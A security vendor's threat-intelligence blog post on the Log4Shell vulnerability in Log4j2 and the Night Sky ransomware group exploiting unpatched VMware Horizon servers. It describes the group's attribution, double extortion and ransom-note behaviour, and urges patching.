When: In December 2021, cybersecurity professionals panicked as Log4Shell challenged the safety of open-source security.
What: The vulnerability is an unauthenticated remote code execution (RCE) vulnerability and Log4j2 is a popular logging library that is used by millions of applications for logging. The Log4Shell exploit allowed for attackers to install cryptominers, as well as steal data and credentials.
Outcome: After the news broke about how easy it was to exploit Log4j2, threat actors made swift moves. Log4Shell resulted in massive worldwide scanning with the payloads running from miners, Unix DDoS malware, and framework stagers pushed to compromised hosts. Conti became the first sophisticated ransomware group to actively exploit the vulnerability, but now there is a new group of threat actors trying to get in on the action.
Who: A group of unknown threat actors have been using Night Sky ransomware to exploit vulnerabilities in Log4j2. There are a total of three Log4Shell vulnerabilities, and while patches are available, Night Sky is still an issue for unpatched versions of the Log4j2 software. Let’s look at Night Sky ransomware and why patching Log4j2 has become a challenge.
As we previously mentioned, we learned there was a critical zero-day vulnerability named Log4Shell in the Apache Log4j2 Java-based logging library. The vulnerability is an unauthenticated remote code execution (RCE) vulnerability that allows for complete system takeover on systems with Log4j 2.0-beta9 up to 2.16.1. Log4Shell could allow attackers to install crypto miners, as well as steal data and credentials.
Initially seen on sites hosting Minecraft servers, attackers discovered the vulnerability could be triggered by hosting chat messages. The first attacks were observed two weeks before they were publicly disclosed, and mass exploitation began a day after the vulnerability was made public. Those exploits originated from professional cryptomining and DDoS botnets, like Muhstik and Mirai. Additionally, Microsoft observed Log4Shell being used to deploy webshells with Cobalt Strike beacons, which are backdoors.
Because almost every network security system runs on some kind of logging process (with Log4j2 being the most popular logging library), Log4Shell was and still is a serious concern for organizations using the software. Millions of applications use Log4j2 and if an attacker had the Log4j2 app, they would be able to compromise it by logging a special string of characters. There ended up being three vulnerabilities associated with Log4Shell (CVE-221-44228, CVE-2021-4104, and CVE-2021-45046) and cyber security analysts knew it was only a matter of time before threat actors found a way to exploit every
single one.
By January 2022, threat actors began to take advantage of the vulnerabilities in Log4j2. The vulnerabilities are:
Although patches are available, many systems remain unpatched, and Night Sky has been exploiting unpatched versions of VMware Horizon. The exploits follow VMware’s security alert warning that CVE-2021-44228 and CVE-2021-45046 were found in VMware Horizon and VMware Horizon Agent that runs on-premises.
Initially discovered by the security research group, MalwareHunterTeam, Night Sky is a new ransomware that is targeting corporate networks. The threat actors behind it are practicing double extortion – demanding payment for a decryptor, as well as for the non-release of stolen data.
The Night Sky operation started on December 27, 2021, and has already published the data of two victims on their Tor data leak site. According to MalwareHunterTeam, the victims are in Bangladesh and Japan. Night Sky demanded $800,000 from one of the victims in exchange for a decryptor and the non-release of all of their stolen data.
Cyber intelligence researchers at Microsoft believe that the threat actors behind Night Sky (tracked as DEV-0401) are based in China. Night Sky previously deployed several ransomware families (LockFile, AtomSilo, and Rook) and exploited other internet-facing systems running Confluence (CVE-2021-26084) and on-premises Exchange servers (CVE-2021-34473).
Image 1: Tweet from Microsoft
The United Kingdom’s National Health Service issued an alert warning that attackers compromised VMware Horizon to gain persistence on the National Health Service’s system. Although these attacks were attributed to a specific group, the Log4j flaw was used.
Source: Twitter
According to Microsoft, the China-based threat actors are using command and control (CnC) servers that spoof legitimate domains. These domains include:
Analysts suspect that the threat actors behind Night Sky infiltrate corporate networks by using tried-and-tested methods, like social engineering tactics or by using stolen credentials. It’s also suspected that before Night Sky is launched, a human operator is involved in the reconnaissance, access, and eventual extraction of files from all network endpoints.
After the ransomware is launched. It encrypts the majority of the files on the affected computers, skipping files with extensions .dll and .exe. Night Sky also skips files and folders contained within the following folders:
$Recycle.Bin | bootmgr | Mozilla Firefox |
All Users | bootmgr.efi | ntldr |
AppData | bootsect.bak | ntuser.dat |
autorun.inf | desktop.ini | ntuser.dat.log |
Boot | ntuser.ini | |
boot.ini | iconcache.db | Opera |
bootfont.bin | Internet Explorer | Opera Software |
bootmgfw.efi | Mozilla | Program Files |
Program Files (x86) | ProgramData | thumbs.db |
Tor Browser | Windows | Windows.old |
Image 2: Night Sky Extension
If your files have been encrypted by Night Sky, you’ll see the following .nightsky extension
Source: blog.malwarebytes.com
Image 3: Night Sky Ransom Note
Night Sky also drops a ransom note in every folder with encrypted files. The note’s file name is NightSkyReadMe.hta.
Source: blog.malwarebytes.com
Image 4: Chat with Night Sky’s Threat Actors
The ransom note includes information about what Night Sky stole, email contacts, and “hardcoded credentials to the victim’s negotiation page”. The hardcoded credentials are then used by the victim to log into a chat (Rocket.Chat URL) so they can reach the threat actors directly.
Source: blog.malwarebytes.com
Because vendors are still in the process of identifying and patching vulnerable software and systems, Log4Shell remains an issue. It also doesn’t make things easier when the customers of those vendors have to test the updates and release them into their own environments. The open-source software vulnerabilities not only affect applications that use vulnerable libraries but any service that uses the applications. Customers may not immediately realize how widespread the issue is within their environment.
"Customers should assume broad availability of exploit code and scanning capabilities to be a real and present danger to their environments. Due to the many software and services that are impacted and given the pace of updates, this is expected to have a long tail for remediation, requiring ongoing, sustainable vigilance." – Microsoft
Although Night Sky is still a relatively new ransomware, it’s a good example of how Log4Shell exploits continue to escalate. With there being so many moving parts, it’s important for everyone who is affected by Log4Shell to do their due diligence and patch their devices. If you leave your device unpatched, you run the risk of threat actors (like those behind Night Sky) breaking into systems, stealing passwords and logins, extracting data, and infecting networks with malicious software. Also, the last thing an organization needs is to be forced into paying a ransom for their own data.
According to CISA, there are largely low-level attacks targeting Log4j2. The attacks that have been observed are primarily aimed at building botnets or cryptomining. However, the Director of CISA, Jen Easterly, warned that advanced threat actors probably already exploited Log4Shell to gain persistence and to go unnoticed on systems until defenders are less alert.
Related Resource: A Comprehensive Guide to Ransomware
When the news broke about Log4j2, Avertium began hunting for evidence of vulnerable or exploited Log4j2 instances in customer environments. Avertium continues to hunt for threats for both Log4j2 and Night Sky ransomware. Take a look at how we controlled our customer environments with Log4j2 and the services we continue to offer for vulnerabilities pertaining to the Log4Shell exploit:
All organizations should scan for vulnerable applications that use Log4j2 and update them to the latest versions.
This document and its contents do not constitute, and are not a substitute for, legal advice. The outcome of a Security Risk Assessment should be utilized to ensure that diligent measures are taken to lower the risk of potential weaknesses be exploited to compromise data.
Although the Services and this report may provide data that Client can use in its compliance efforts, Client (not Avertium) is ultimately responsible for assessing and meeting Client's own compliance responsibilities. This report does not constitute a guarantee or assurance of Client's compliance with any law, regulation or standard.
COPYRIGHT: Copyright © Avertium, LLC and/or Avertium Tennessee, Inc. | All rights reserved.
In this eBook, you will learn: